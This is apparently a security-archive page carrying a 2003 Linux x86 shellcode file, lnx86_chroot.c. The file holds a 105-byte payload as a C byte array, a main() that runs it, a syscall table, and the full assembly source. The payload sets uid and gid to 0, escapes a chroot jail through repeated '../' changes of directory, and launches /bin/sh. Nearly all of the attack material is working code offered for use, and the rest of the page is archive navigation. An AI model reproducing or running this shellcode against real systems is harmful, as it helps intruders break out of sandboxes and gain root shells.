lnx86_chroot.c

lnx86_chroot.c: Posted Oct 16, 2003; Authored by posidron | Site tripbit.org; 105 byte size shellcode that executes: setuid(), setgid(), mkdir(), chroot(), chdir(), chroot(), execv(), exit(). ASM code and syscall table are included.; tags | shellcode; SHA-256 | 2d9d05332ebda5bbdce4419ae67090617a9ffcd128b5e47e8ef0c3798f7e4dc3; Download | Favorite | View

lnx86_chroot.c

/*  Tripbit Security Research (tripbit.org)
 *
 *        title: lnx86_brkchroot
 *         size: 105 bytes
 *  execute: setuid(), setgid(), mkdir(), chroot(),
 *     chdir(), chroot(), execv(), exit()
 *       system: linux x86
 *       author: posidron
 *      contact: posidron[at]tripbit.org
 */


char shellcode[]= "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\xb0\x2e"
      "\xcd\x80\x31\xc0\x53\x68\x77\x30\x30\x74\x89\xe3"
      "\xb0\x27\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x31\xc0"
      "\x31\xdb\x31\xc9\xb1\x0a\x50\x68\x2e\x2e\x2f\x2f"
      "\xe2\xf9\x89\xe3\xb0\x0c\xcd\x80\x31\xc0\x31\xdb"
      "\x6a\x2e\x89\xe3\xb0\x3d\xcd\x80\x31\xc0\x31\xdb"
      "\x31\xc9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
      "\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd"
      "\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80";

int main(int argc, char **argv)
{
  void(*tsr) (void);
        tsr = (void*)shellcode;
        tsr();
  return 0;
}


/*
%eax  Name         Source                       %ebx           %ecx 
1     sys_exit     kernel/exit.c                int            -
11    sys_execve   arch/i386/kernel/process.c   struct pt_regs -
12    sys_chdir    fs/open.c                    const char*    - 
23    sys_setuid   kernel/sys.c                 uid_t          -
46    sys_setgid   kernel/sys.c                 gid_t          -
39    sys_mkdir    fs/namei.c                   const char*    int 
61    sys_chroot   fs/open.c                    const char*    - 
*/


/*
main()
{
  __asm__("
    xor %eax, %eax
    xor %ebx, %ebx
    mov $0x17, %al
    int $0x80
  
    xor %eax, %eax
    mov $0x2e, %al
    int $0x80

    xor %eax, %eax
    push %ebx
    push $0x74303077
    mov %esp, %ebx
    mov $0x27, %al
    int $0x80
    
    xor %eax, %eax
    mov $0x3d, %al
    int $0x80
    
    xor %eax, %eax
    xor %ebx, %ebx
    xor %ecx, %ecx
    mov $0xa, %cl
    push %eax
    evil:
    pushl $0x2f2f2e2e
    loop evil
    mov %esp, %ebx
    mov $0xc, %al
    int $0x80
  
    xor %eax, %eax
    xor %ebx, %ebx
    push $0x2e
    mov %esp, %ebx
    mov $0x3d, %al
    int $0x80
  
    xor %eax, %eax
    xor %ebx, %ebx
    xor %ecx, %ecx
    push %eax
    push $0x68732f2f
    push $0x6e69622f
    mov %esp, %ebx
    push %eax
    push %ebx
    mov %esp, %ecx
    xor %edx, %edx
    mov $0xb,%al
    int $0x80

    xor %eax, %eax
    xor %ebx, %ebx
    mov $0x1,  %al
    int $0x80
  ");
}*/

Top Authors In Last 30 Days

Red Hat 221 files
Ubuntu 59 files
Debian 30 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,298)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,550)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,453)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

lnx86_chroot.c

lnx86_chroot.c

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

lnx86_chroot.c

Share This

lnx86_chroot.c

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems